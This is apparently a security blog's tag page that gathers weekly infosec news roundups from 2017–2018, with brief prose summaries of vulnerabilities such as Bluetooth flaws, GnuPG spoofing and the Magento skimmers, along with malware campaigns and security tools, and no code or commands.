Tag bluetooth

InfoSec Week 25, 2018

Marcus Brinkmann demonstrated how some configuration options in the GnuPG allow remote attackers to spoof arbitrary signature. He used the embedded “filename” parameter in OpenPGP literal data packets, together with the verbose option set in their gpg.conf file.

Tapplock Smart Lock has critical bugs making it a trivial protection. They are using the AES key derived from the MAC address, so anyone with a Bluetooth enabled smartphone can pick up the key upon getting to a smart lock Bluetooth range.

Crooks are injecting credit card stealing backdoor to the config files of a hacked Magento e-commerce platforms. They can reinfect the rest of code base over and over again with the config load.

Updated Satori botnet began to perform network wide scan looking for exploitable XiongMai uc-httpd 1.0.0 devices (CVE-2018-10088).

Baby Monitors in the USA were hacked via obscure Chinese IoT cloud. The woman from the Facebook post claims that someone controlled the camera remotely and spied on her, possibly listened in to conversations.

OpenBSD disables Intel's hyper-threading due to possible exploitable spectre-class bugs in the architecture.

Linux is getting support for in-kernel hibernation encryption. Encrypts disk-image memory, thereby increasing the general security of full-disk encryption on Linux and reducing the attack surface.

OTSECA - (ot)her (sec)urity (a)wareness is an open source security auditing tool to search and dump system configuration. It allows you to generate reports in HTML or RAW-HTML formats.

InfoSec Week 15, 2018

The U.S. Secret Service is warning about a new scam scheme where the crooks are intercepting new debit cards in the mail and replace the chips on the cards with chips from old cards. Once owners activate the cards, crooks will use stolen chips for their financial gain.

Russian state regulator Roskomnadzor have ordered to block the Telegram messaging application 48 hours after it missed a deadline to give up encryption keys to the online conversations of its users. I am not sure whether the Telegram protocol is actually blocked in Russia now.

A new Android P version will enforce applications to communicate over TLS secured connection by default.

Kudelski Security published a walk-through guide about Manger's attack against RSA OAEP. 1-bit leak from oraculum suffices to decrypt ciphertexts.

In depth article about stealing FUZE credit card content via Bluetooth.

Understanding Code Signing Abuse in Malware Campaigns. Pretty good statistics.

There is a vulnerability that results in a bypass of a tamper protection provided by the Sophos Endpoint Protection v10.7. Protection mechanism can be bypassed by deleting the unprotected registry key.

Several vulnerabilities have been found in the Apache HTTPD server. Update now.

Microsoft Windows tool certutil.exe for displaying certification authority information can be used to fetch data from the internet in the similar fashion like WGET or CURL.

There is a paper about breaking 256-bit security (NIST post-quantum candidate) WalnutDSA in under a minute.

Snallygaster - a Tool to Scan for Secrets on Web Servers

Nice map of the ongoing Linux kernel defenses. The map shows the relations between the vulnerability classes, current kernel defenses and bug detection mechanisms.

InfoSec Week 47, 2017

According to the annual State of Open Source Security report, 77% of 433000 analyzed sites use at least one front-end JavaScript library with a known security vulnerability.

The AWS team published blog about the recent improvements to the secure random number generation in Linux 4.14, OpenSSL and libc.

Really good introduction to the anonymous communication network design and mix nets in general, published by Least Authority.

Those guys reverse-engineered the Furby Connect DLC file format and are able to remotely upload their own logos, songs to the device over Bluetooth.

There is a critical vulnerability in the MacOS High Sierra, anyone can login as root with empty password after clicking on login button several times. For now, it could be mitigated by just changing the root password.

Very good investigative journalism about the mysterious NSA contractor which could provided top secret documents to the Shadow Brokers.

Uber paid hackers $100k to delete stolen data on 57 million people and shut up. They have even tried to fake it as an bug bounty payment.

Someone published remote code execution exploit for the Exim Mail server (CVE-2017-16944) on GitHub. Shodan.io shows more than 400k servers with the vulnerable CHUNKING feature.

InfoSec Week 36, 2017

The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in D-Link routers.

There is a new research paper published on a security of a Bluetooth stack named "The dangers of Bluetooth implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth stacks." Really alarming vulnerabilities discussed.
From a paper: "BlueBorne allows attackers to take control of devices, access corporate data and networks, penetrate secure “air-gapped” networks, and spread malware to other devices. The attack does not require the targeted device to be set on discoverable mode or to be paired to the attacker’s device."

FireEye has analyzed a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability leveraged by attackers to distribute notoriously known FinFisher / FINSPY malware.
I have included exploit example that is published on a GitHub.

Kaspersky Labs have analyzed the trend of malicious cryptocurrency mining practices on an infected machines.

The Android BankBot malware found on Google Play store is targeting multiple UAE banking applications.

Good analysis of how the JavaScript framework can be abused to bypass XSS mitigations, specifically NoScript’s XSS filter.

NSA had developed the capability to decrypt and decode Kazaa and eDonkey file-sharing apps traffic to determine which files are being shared, and what queries are being performed over those P2P networks.

Formally verified implementation of Curve25519 made it into Firefox 57. And it is 20% faster on 64-bit architectures.

A nice curated list of IDA plugins.

InfoSec Week 8, 2017

Malware samples recovered from watering hole attacks against the Polish financial regulator's website contain false flags that fraudulently suggest Russian actors are behind the campaign. BAE Systems Threat Research attributed the attack to the notoriously known Lazarus Group.

TeamSpy malware targets high-profile industrial executives, researchers and diplomats using phishing attack. If successful, the malware installs keylogger and hidden TeamViewer application.

The world's largest spam botnet Necurs, with 5 million infected hosts, has added a DDoS module.

Montenegro suffered massive cyberattacks against government and media websites.

This one about Cloudflare bug is all over the internet, but I found the report from the Google Project Zero engineer interesting.
https://bugs.chromium.org/p/project-zero/issues/detail?id=1139 https://medium.com/@octal/cloudbleed-how-to-deal-with-it-150e907fd165

Google announces first SHA1 collision attack, demonstrating it with two PDF files.

Short blog with the self explanatory headline "Why it sucks to be a Security Researcher" written by a Sakurity infosec guy.

Crackle is a tool to crack Bluetooth Smart Encryption (BLE). It exploits a flaw in the pairing mechanism that leaves all communications vulnerable to decryption by passive eavesdroppers.
https://github.com/mikeryan/crackle http://www.darknet.org.uk/2017/02/crackle-crack-bluetooth-smart-encryption-ble/

The Mercure is a tool for generating and managing phishing campaigns. It includes email templates, attachments and landing page management.